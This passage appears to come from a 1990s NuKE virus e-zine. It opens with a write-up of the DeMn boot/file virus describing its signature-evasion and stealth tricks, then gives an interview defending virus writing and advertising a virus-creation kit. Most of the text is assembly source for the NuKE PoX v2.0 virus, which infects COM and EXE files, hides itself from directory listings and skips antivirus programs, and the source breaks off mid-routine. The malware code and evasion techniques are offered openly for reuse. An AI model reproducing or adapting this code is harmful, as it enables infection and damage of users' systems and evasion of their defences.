extremely small, and I don't want to be influenced by other
implementations unless they're better).
It infects both floppy boot sectors, moving the original boot sector to
the 5th last sector of the disk and writing the virus code on the last
four. It also infects the Master Boot Record (partition table) on the
first physical hard disk. Booting off an infected floppy will infect
the MBR, as will the execution of an infected file. However, trying to
read the partition table results in the redirection of the call,
resulting in the original partition table (prior to infection) being
read/written.
Floppies are infected on read/write access, and won't be infected if the
drive is still spinning (ie. no disk change). It will take the boot
sector and use the BPB to calculate the last sectors of the disk, no
matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk.
It makes sure it's a valid BPB by checking the OEM name to see if it's
valid alphanumeric characters, but I was a bit selfish in that I overwrite
the last word of OEM to mark infection.
Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be
infected on every possible file handle access I could find, ie. they
will be infected on Open (3D), Close (3E), Attrib Change (43), Execution
(4B), Handle Rename/Move (56), and Extended Open (6C). It manages to
infect on file close by recording the filename by intercepting Create
(3C) call, and the handle if it was created successfully.
If resident off infected file, it will not hook int 13h directly,
instead searching segment 70h for DOS's call to the original interrupt
handler, then putting our address in there instead and using the old
address for our calls. It would have been possible to search the ROM
BIOS for the correct handler, but that would circumvent future
generations of boot/file viruses.
DeMn employs a small decryption algorythm, however it is not variable
mutation, since a few registers have to be saved in order for the SYS
infection to work. The code is thoroughly encrypted, and McAfee and
friends will have to write a new disinfection engine for this baby.
However, disk infections are not encrypted, although it would have been
easily done.
The routine to load the virus off the disk has been altered to avoid
detection as Generic Boot Sector/Generic Partition virus. The changes
are trivial, and it makes it look as if I don't know what I'm doing.
The fact that I'm avoiding detection isn't readily apparent. Here is
a code comparison, take a look for yourself.
Generic DeMn
mov si, 413h mov si, 412h
sub word ptr [si], 3 add word ptr [si+1], -3 ; take 3k
int 12h lodsb
lodsw
mov cl, 6 mov cl, 6
shl ax, cl shl ax, cl
mov es, ax mov es, ax
xor bx, bx xor bx, bx
The one on the left will be detected by SCAN, the one on the right will
not. The differences are trivial. SCAN is such a stupid program, it's
just ridiculous that millions of PC users rely on it utterly for total
virus protection. That's great...
DeMn is partially selective in which files it infects. Firstly, it
will scan the filename for the characters SC, VS, CL and F-, which
excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and
F-PROT.
Nor will it infect programs which have internal overlays. This is a
great advantage since people running WinDoze won't have their favourite
XYZ program fuck up because a virus infected it. DeMn simply will
not infect programs with internal overlays. Here is the code to detect
them:
chkovl: call file_end
push ax ; check for internal overlays
push dx
mov ax, word ptr [page_cnt]
mov cx, 512
mul cx
pop cx
pop bp
cmp ax, bp
jb done
cmp dx, cx
jb done
[...]
done: ret
Pretty simple routine, huh?
The beauty of this beast is that one small mistake, like trying to boot
an infected disk by
accident, or perhaps running an infected file, is
that next time you boot up your system, EVERY file in your CONFIG.SYS,
AUTOEXEC.BAT and everything henceforth will become infected! It is very
easy to expose a large number of files to the virus in a very short
space of time. Again, SCAN will probably help the spread of this virus
immensely, by stupid users scanning their HD habitually, with the virus
in memory... of course, EVERY file will then be infected.
As if that weren't enough for one virus, DeMn will also hide the
increase of file size on the DOS directory. However, like most other
viruses which employ this stealth method, CHKDSK will not report any
allocation errors on these files. File size increase will be only 2048
bytes, or 4096 bytes for SYS files. It will account for the different
increase of the SYS.
To hide the increase, DeMn employs a little-exploited method, which
is by adding 100 years to the date of the file. This way, other
over-exploited methods (like setting the seconds field to a certain
value) will not interfere with DeMn's stealth operation, and
vice-versa.
DeMn also includes a number of text strings:
"[DeMn] by TLN-{NKä}" 25 bytes
"Hugs to Sara Gordon" 19 bytes
"Hey John! If this is bad, wait for [VCL20]!" 43 bytes
"For Dudley" 11 bytes
"[VCL20á]/TLN" 15 bytes
total 113 bytes
(That stuff about VCL20á is áogus, just to make McAsshole shit his
pants. But AV researchers be warned: a fair few of the routines
contained in DeMn will also appear in VCL 2.0, like the boot/file
infect capability!)
Virus Length = 2048
Message Length = 113
...Code Length = 1935 bytes!!!
Totally unheard of!
I seriously doubt anybody can beat that, at least not for a while yet.
For a quick rehash of what this virus does...
COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a
mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck
up her description of this virus, she is so pathetically brain-dead.
Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR
INFECTOR coming soon to a computer installation near you! From TLN of
course! And another one minus the polymorphism, under 800 bytes!
Have fun! And good night, John!
TLN/NuKE
===========================================================================
===========================================================================
Sunday Telegraph Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, about a month ago a NuKE associate received a call from a female
reporter named Barbara Lewis; it was not our first, and surely not our
last. Nevertheless, the topic she arose was quite interesting! We have
the complete conversation with our NuKE member and Barbara Lewis.
For those that need more info, Barbara Lewis is an English reporter for
the _Sunday Telegraph_ in the United Kingdom. The article should
also be published in the _New York Times_, and I guess we will pin it up
with the others now. Anyhow the conversation...
Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...]
Nuke > Hello?
Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara
Lewis, for the _Sunday Telegraph_ in London. Is he there?
Nuke > This is he, how can I help you. [The old charms.]
Barbara> I am writing an article on virus groups and related underground
activities, I received this number from a friend telling me I
could get some information from you.
Nuke > What do you wish to know, and I will see if I can help you.
Barbara> I wish to know about the virus writers, why do they write such
programs? What do they find from these malicious programs?
Nuke > I believe you have the concept all messed up. Speaking on the
behalf of NuKE members we find that producing perhaps the
most technological advanced virus to exist, will if chance help
the AV (anti-virus) community to develop a standard or perhaps
a minimum of what their packages should do, as if it is capable
of the most advanced virus then getting the others is no problem.
Also, we see today that the anti-virus community are trying to
pull a suppression over all the computer users, and terrorize
them with this bad thing called a virus. Of course this method
is simply for the fact of increasing sales of their AV product,
which in turn is described to perform miracles when it comes
to virus protection. We have all heard about the well known
SCAN by McAfee, we have succeed in removing all their virus
strings and have found that there was only 850 of them, and
doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of
every virus twice? Who knows!
Barbara> So you say that you are helping out the AV community?
Nuke > Well, not really, our basic idea is to help YOU, the average
computer user that is dumb on computer structures and uses
these software packages to only later find out he was raped,
raped out of his data and his money. I'll give you an example.
F-Prot is heard to be a great anti-viral kit, and that it can
stop many viruses at its tracks, unknown and known. Inside the
F-Prot kit there is a program called VIRSTOP, it is a TSR program
that will check every file you run for infection etc... Now who
would expect that VIRSTOP only detects 800 viruses, NOT MORE!
And the strings are cheap works that would lose all credit for
Frisk and his package if "word got out!" Lemme tell you, the
well-known encryption engines like MtE are NOT detected by
VIRSTOP! It is not a miss in code, Frisk NEVER put the damn
routine inside, it is incapable to detect any polymorphic virus
that has infected the system! You have just succeeded into
screwing yourself just as McAfee did with SCAN!
See, we are here to show you the facts, many people are not
able to disassemble and look through the code and find out what
the virus package can detect! So we bring this information out
to the public, all I say is TRUE and can be backed up with the
proof I found inside these AV programs!
Barbara> What about the virus writers wanting to cause damage?
Nuke > Again that is why we are here, if you produce you a virus that
is unbelievable, the advances in the scanners will increase by
learning from our viruses, and the chances of a 14-year-old
wanting to create a virus for revenge or whatever reason
cannot compete with this and their virus become a failure,
which is exactly what we want! And we too do not enjoy those
"kids" that enjoy damage, we run this organization legally and
seriously. If we do find such a user within our circle surely
he will be made an example of.
Barbara> There has been a group of teenagers in England that were virus
writers and called themselves ARCV, they have been arrested as
of Feb 8th, 1993 and are going on trail for creating viruses.
What do you think of this?
Nuke > Yes, ARCV, I knew them well. In this case I CANNOT say that I
am happy to see them arrested, you see many of there viruses
have been found and related to VCL/MPC generators. See, VCL is
a friendly user kit standing for Virus Creation Laboratory, all
one has to do is flag on the option he/she would want with his
dandy mouse and once done hit compile and the kit will produce
you the virus you asked it to do. Now are we going to put some-
one on trial for simply using such a program? Are we going to
introduce laws that make it illegal to run certain programs in
YOUR OWN computer? I find that a laugh! They certainly can not
be responsible!
Barbara> Then whom are we going to made responsible for these acts?
Nuke > Tough question, well I certainly do not believe that ARCV is.
I know several whom have used the VCL kit to generate viruses
to test how effective their anti-virus program was. This person
created the virus, in order to test them, should he be arrested
and tried? How do we know if a "bullet-proof" vest can withstand
a bullet? Naturally we test it! Also I find you are loosing
touch with the real issue! A virus is nothing but a program, it
can not be created by itself, it will do exactly what the
creator wanted it to do! Nothing more or less. ARCV's virus never
contain any DAMAGING CODE, they were viruses with little messages
and all... Wouldn't you say the guilty person is the one that
intensionally or carelessly created the virus for the produce to
cause havoc? The maker of a gun is not responsible for all the
murders but those that use it for that intension are.
Barbara> You seem to know a lot on what is happening on this topic, may I
ask to what organization you belong to?
Nuke > Sure, we called ourselves "NuKE" we are an international group,
ranging from Canada, USA, Australia, Europe. We are highly
organized, much more than what anybody would expect! We monitor
the virus and AV scene, not many would know it, but we do. We are
the makers of VCL which was the first of its kind, and STILL IS,
the ONLY virus kit to fully create your unique virus, many like
MPC consist on one virus which is broken up, we provide options as
adding you own feature or choose any 24 we have. We will be
releasing a VCL v2.0 to be again the FIRST of its kind surpassing
anything out there, it may "boggle" the world, but it will set
new standards and pave new methods of virus scanning, it will
unfortunately kill the little guys, by in this world you have to
be very competitive. The VCL kit will perhaps be marketed, if you
wish you may even buy an advance copy when it comes out within
a month!
Barbara> Sounds interesting, what is the price range?
Nuke > Humm...I guess 75$-100$ (US)
Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this
program is available.
Nuke > K0ol...Will do... [Wow a date already?]
Barbara> I thank you for you time, and good day. [Mush]
Nuke > Okay now taw-taw... [English humour]
The NuKE Associates
===========================================================================
;==========================================================================
; ** NuKE Pox v2.0 **
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to
;see, and understand it! I don't care if you fuck with it, go for it!
;The method of TSR is old, method of getting the Vectors is bad, the way
;I infect EXEs ain't too hot... But hell it works! It infects overlays..
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;
;And to all those that said I `Hacked' this...
; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU
; FF UU UU CC CC KK KK YY YY OO OO UU UU
; FFFF UU UU CC KKK === YY OO OO UU UU
; FF UU UU CC CC KK KK YY OO OO UU UU
; FF UUUUUU CCCC KK KK YY OOOO UUUUUU
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are
;500% better than this one...
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-* (c) Rock Steady, Viral Developments -*
;*- (c) NuKE Software Developement 1991, 1992 *-
;-* -*
;*- Virus: NuKE PoX Version: 2.0 *-
;-* ~~~~~~ ~~~~~~~~ -*
;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *-
;-* Will Disinfect files that are opened, and re-infect them -*
;*- when they are closed! Executed files are disinfected then *-
;-* executed, and when terminated reinfected! -*
;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *-
;-* It is listed as a COMMON Virus due to is stealthiness! -*
;*- Bytes: 1800 Bytes *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus_size equ last - init_virus ;Virus size
mut1 equ 3
mut2 equ 1
mut3 equ 103h ;Offset location
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h ;COM file!
rocko proc far
start: jmp init_virus
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Virus Begins Here...
;-------------------------------------------------------------------------
init_virus: call doit_now ;Doit VirusMan...
doit_now: pop bp ;Not to Lose Track
sub bp,106h ;Set our position
push ax ;Save all the regesters
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
mov ax,0abcdh ;Are we resident Already?
int 21h ;***McAfee Scan String!
cmp bx,0abcdh ;Yupe... Quit Then...
je exit_com
push cs ;Get CS=DS
pop ds
mov cx,es
mov ax,3521h ;Sometimes tend to inter-
int 21h ;cept this Interrupt...
mov word ptr cs:[int21+2][bp],es ;Save the Int
mov word ptr cs:[int21][bp],bx ;Vector Table
dec cx ;Get a new Memory block
mov es,cx ;Put it Back to ES
mov bx,es:mut1 ;Get TOM size
mov dx,virus_size ;Virus size in DX
mov cl,4 ;Shift 4 bits
shr dx,cl ;Fast way to divide by 16
add dx,4 ;add 1 more para segment
mov cx,es ;current MCB segment
sub bx,dx ;sub virus_size from TOM
inc cx ;put back right location
mov es,cx
mov ah,4ah ;Set_block
int 21h
jc exit_com
mov ah,48h ;now allocate it
dec dx ;number of para
mov bx,dx ;
int 21h
jc exit_com
dec ax ;get MCB
mov es,ax
mov cx,8h ;Made DOS the owner of MCB
mov es:mut2,cx ;put it...
sub ax,0fh ;get TOM
mov di,mut3 ;beginnig of our loc in mem
mov es,ax ;
mov si,bp ;delta pointer
add si,offset init_virus ;where to start
mov cx,virus_size
cld
repne movsb ;move us
mov ax,2521h ;Restore Int21 with ours
mov dx,offset int21_handler ;Where it starts
push es
pop ds
int 21h
exit_com: push cs
pop ds
cmp word ptr cs:[buffer][bp],5A4Dh
je exit_exe_file
mov bx,offset buffer ;Its a COM file restore
add bx,bp ;First three Bytes...
mov ax,[bx] ;Mov the Byte to AX
mov word ptr ds:[100h],ax ;First two bytes Restored
add bx,2 ;Get the next Byte
mov al,[bx] ;Move the Byte to AL
mov byte ptr ds:[102h],al ;Restore the Last of 3b
pop ds
pop es
pop bp ;Restore Regesters
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ax,100h ;Jump Back to Beginning
push ax ;Restores our IP (a CALL
retn ;Saves them, now we changed
command db "C:\COMMAND.COM",0
exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc
mov dx,cs ;
sub dx,bx
mov ax,dx
add ax,word ptr cs:[exe_cs][bp] ;add it to our segs
add dx,word ptr cs:[exe_ss][bp]
mov bx,word ptr cs:[exe_ip][bp]
mov word ptr cs:[fuck_yeah][bp],bx
mov word ptr cs:[fuck_yeah+2][bp],ax
mov ax,word ptr cs:[exe_ip][bp]
mov word ptr cs:[Rock_fix1][bp],dx
mov word ptr cs:[Rock_fix2][bp],ax
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 0B8h ;nothing but MOV AX,XXXX
Rock_Fix1:
dw 0
cli
mov ss,ax
db 0BCh ;nothing but MOV SP,XXXX
Rock_Fix2:
dw 0
sti
db 0EAh ;nothing but JMP XXXX:XXXX
Fuck_yeah:
dd 0
int21 dd ? ;Our Old Int21
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Dir Handler
;-------------------------------------------------------------------------
old_dir: call calldos21 ;get FCB
test al,al ;error?
jnz old_out ;nope
push ax
push bx
push es
mov ah,51h ;get PSP
int 21h
mov es,bx ;
cmp bx,es:[16h] ;
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al ;Extended FCB?
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh
cmp al,1eh
jnz not_infected
and byte ptr es:[bx+17h],0e0h ;fix secs
sub word ptr es:[bx+1dh],virus_size
sbb word ptr es:[bx+1fh],0
not_infected: pop es
pop bx
pop ax
old_out: iret
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Int 21 Handler
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
int21_handler: cmp ah,11h
je old_dir
cmp ah,12h
je old_dir
cmp ax,4b00h ;File executed
je dis_infect
cmp ah,3dh
je check_file
cmp ah,3eh
je check_file2
cmp ax,0abcdh ;Virus testing
jne int21call
mov bx,0abcdh
int21call: jmp dword ptr cs:[int21] ;Split...
check_file: jmp opening_file ;Like a Charm
check_file2: jmp closing_file
dis_infect: call disinfect ;EXE & COM okay
dont_disinfect: push dx
pushf
push cs
call int21call
pop dx
execute: push ax
push bx
push cx
push dx
push ds
push ax
push bx
push cx
push dx
push ds
push bp
push cs
pop ds
mov dx,offset command
mov bp,0abcdh
jmp command1
command_ret: pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call check_4_av
jc exit1
command1: mov ax,4300h ;Get file Attribs
call calldos21
jc exit1
test cl,1h ;Make sure there normal
jz open_file ;Okay there are
and cl,0feh ;Nope, Fix them...
mov ax,4301h ;Save them now
call calldos21
jc exit
open_file: mov ax,3D02h
call calldos21
exit1: jc exit
mov bx,ax ;BX File handler
mov ax,5700h ;Get file TIME + DATE
Call calldos21
mov al,cl
or cl,1fh ;Un mask Seconds
dec cx ;60 seconds
xor al,cl ;Is it 60 seconds?
jz exit ;File already infected
push cs
pop ds
mov word ptr ds:[old_time],cx ;Save Time
mov word ptr ds:[old_date],dx ;Save Date
mov ah,3Fh
mov cx,1Bh ;Read first 1B
mov dx,offset ds:[buffer] ;into our Buffer
call calldos21
jc exit_now ;Error Split
mov ax,4202h ;Move file pointer
xor cx,cx ;to EOF File
xor dx,dx
call calldos21
jc exit_now ;Error Split
cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE?
je exe_infect ;Infect EXE file
mov cx,ax
sub cx,3 ;Set the JMP
mov word ptr ds:[jump_address+1],cx
call infect_me ;Infect!
jc exit
mov ah,40h ;Write back the
mov dx,offset jump_address
mov cx,3h
call calldos21
exit_now:
mov cx,word ptr ds:[old_time] ;Restore old time
mov dx,word ptr ds:[old_date] ;Restore Old date
mov ax,5701h
call calldos21
mov ah,3Eh
call calldos21
exit: cmp bp,0abcdh
je command2
pop ds
pop dx
pop cx
pop bx
pop ax
iret
command2: jmp command_ret
exe_infect: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc exit
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz outta_here
inc dx
outta_here: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
exit_exe: jmp exit_now
rocko endp
vir_cs dw 0
exe_ip dw 0
exe_cs dw 0
exe_sp dw 0
exe_ss dw 0
exe_sz dw 0
exe_rm dw 0
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Opening File handle AX=3D
;-------------------------------------------------------------------------
opening_file: call check_extension
jnc open_fuck2
call check_exten_exe
jnc open_fuck2
jmp dword ptr cs:[int21]
open_fuck2: push ax
mov ax,3d02h
call calldos21
jnc open_fuck1
pop ax
iret
open_fuck1: push bx
push cx
push dx
push ds
mov bx,ax
mov ax,5700h
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jnz opening_exit3
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes Pointer to EOF
xor cx,cx
xor dx,dx
call calldos21
mov cx,dx
mov dx,ax
push cx
push dx
sub dx,1Bh ;Get first 3 Bytes
sbb cx,0
mov ax,4200h
call calldos21
push cs
pop ds
mov ah,3fh ;Read them into Buffer
mov cx,1Bh
mov dx,offset buffer
call calldos21
xor cx,cx ;Goto Beginning of File
xor dx,dx
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp
mov cx,3h
open_exe_jmp: call calldos21
pop dx ;EOF - Virus_Size
pop cx ;to get ORIGINAL File size
sub dx,virus_size
sbb cx,0
mov ax,4200h
call calldos21
mov ah,40h ;Fix Bytes
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
int 21h
mov ah,3eh ;Close File
call calldos21
opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Closing File Handle INFECT it!
;-------------------------------------------------------------------------
closing_file: cmp bx,0h
je closing_bye
cmp bx,5h
ja close_cont
closing_bye: jmp dword ptr cs:[int21]
close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp
push bx
mov ax,1220h
int 2fh
mov ax,1216h
mov bl,es:[di]
int 2fh
pop bx
add di,0011h
mov byte ptr es:[di-0fh],02h
add di,0017h
cmp word ptr es:[di],'OC'
jne closing_next_try
cmp byte ptr es:[di+2h],'M'
jne pre_exit
jmp closing_cunt3
closing_next_try:
cmp word ptr es:[di],'XE'
jne pre_exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit
closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit
closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit
closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3
pre_exit: jmp closing_nogood
closing_cunt3: mov ax,5700h
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood
push cs
pop ds
mov word ptr ds:[old_time],cx
mov word ptr ds:[old_date],dx
mov ax,4200h
xor cx,cx
xor dx,dx
call calldos21
mov ah,3fh
mov cx,1Bh
mov dx,offset buffer
call calldos21
jc closing_no_good
mov ax,4202h
xor cx,cx
xor dx,dx
call calldos21
jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh
je closing_exe
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx
call infect_me
jc closing_no_good
mov ah,40h
mov dx,offset jump_address
mov cx,3h
call calldos21
closing_no_good:
mov cx,word ptr ds:[old_time]
mov dx,word ptr ds:[old_date]
mov ax,5701h
call calldos21
closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
closing_exe: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
closing_over: jmp closing_no_good
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21
jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;top of file
call calldos21
jc exit_error ;Split Dude...
clc ;Clear carry flag
ret
exit_error:
stc ;Set carry flag
ret
infect_me endp
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; DisInfection Routine for 4B
;-------------------------------------------------------------------------
Disinfect PROC
push ax
push bx ;Save them
push cx
push dx
push ds
mov ax,4300h ;Get file Attribs
call calldos21
test cl,1h ;Test for Normal Attribs
jz okay_dis ;Yes, File can be opened
and cl,0feh ;No, Set them to Normal
mov ax,4301h ;Save attribs to file
call calldos21
jc half_way
okay_dis: mov ax,3d02h ;File now can be opened
call calldos21 ;Safely
jc half_way
mov bx,ax ;Put File Handle in BX
mov ax,5700h ;Get File Time & Date
call calldos21
mov al,cl ;Check to see if infected
or cl,1fh ;Unmask Seconds
dec cx ;Test to see if 60 seconds
xor al,cl
jnz half_way ;No, Quit File AIN'T
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes, file is infected
xor cx,cx ;Goto the End of File
xor dx,dx
call calldos21
push cs
pop ds
mov cx,dx ;Save Location into
mov dx,ax ;CX:DX
push cx ;Push them for later use
push dx
sub dx,1Bh ;Subtract file 1Bh from the
sbb cx,0 ;End so you will find the
mov ax,4200h ;Original EXE header or
call calldos21 ;First 3 bytes for COMs
mov ah,3fh ;Read them into Buffer
mov cx,1Bh ;Read all of the 1B bytes
mov dx,offset buffer ;Put them into our buffer
call calldos21
jmp half
half_way: jmp end_dis
half: xor cx,cx ;
xor dx,dx ;Goto the BEGINNING of file
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer ;from buffer to COM
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je dis_exe_jmp
mov cx,3h
dis_exe_jmp: call calldos21
pop dx ;Restore CX:DX which they
pop cx ;to the End of FILE
sub dx,virus_size ;Remove Virus From the END
sbb cx,0 ;of the Orignal File
mov ax,4200h ;Get new EOF
call calldos21
mov ah,40h ;Write new EOF to File
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
call calldos21
mov ah,3eh ;Close File
call calldos21
end_dis: pop ds
pop dx
pop cx ;Restore 'em
pop bx
pop ax
ret
disinfect ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;--------------------------------------------------------------------------
Check_extension PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me: cmp byte ptr ds:[si],2eh
je next_ok
inc si
loop loop_me
next_ok: cmp word ptr ds:[si+1],'OC'
jne next_1
cmp byte ptr ds:[si+3],'M'
je good_file
next_1: cmp word ptr ds:[si+1],'oc'
jne next_2
cmp byte ptr ds:[si+3],'m'
je good_file
next_2: pop cx
pop si
stc
ret
good_file: pop cx
pop si
clc
ret
Check_extension ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;-------------------------------------------------------------------------
Check_exten_exe PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me_exe: cmp byte ptr ds:[si],2eh
je next_ok_exe
inc si
loop loop_me_exe
next_ok_exe: cmp word ptr ds:[si+1],'XE'
jne next_1_exe
cmp byte ptr ds:[si+3],'E'
je good_file_exe
next_1_exe: cmp word ptr ds:[si+1],'xe'
jne next_2_exe
cmp byte ptr ds:[si+3],'e'
je good_file_exe
next_2_exe: pop cx
pop si
stc
ret
good_file_exe: pop cx
pop si
clc
ret
Check_exten_exe ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Call Int_21h Okay
;-------------------------------------------------------------------------
calldos21 PROC
pushf
call dword ptr cs:[int21]
retn
calldos21 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; MultiPly
;--------------------------------------------------------------------------
multiply PROC
push bx
push cx
mov cl,0Ch
shl dx,cl
xchg bx,ax
mov cl,4
shr bx,cl
and ax,0Fh
add dx,bx
pop cx
pop bx
retn
multiply ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check for AV file... Like SCAN.EXE or F-PROT.EXE
;-------------------------------------------------------------------------
Check_4_av PROC
push si
push cx
mov si,dx
mov cx,256h
av: cmp byte ptr ds:[si],2eh
je av1
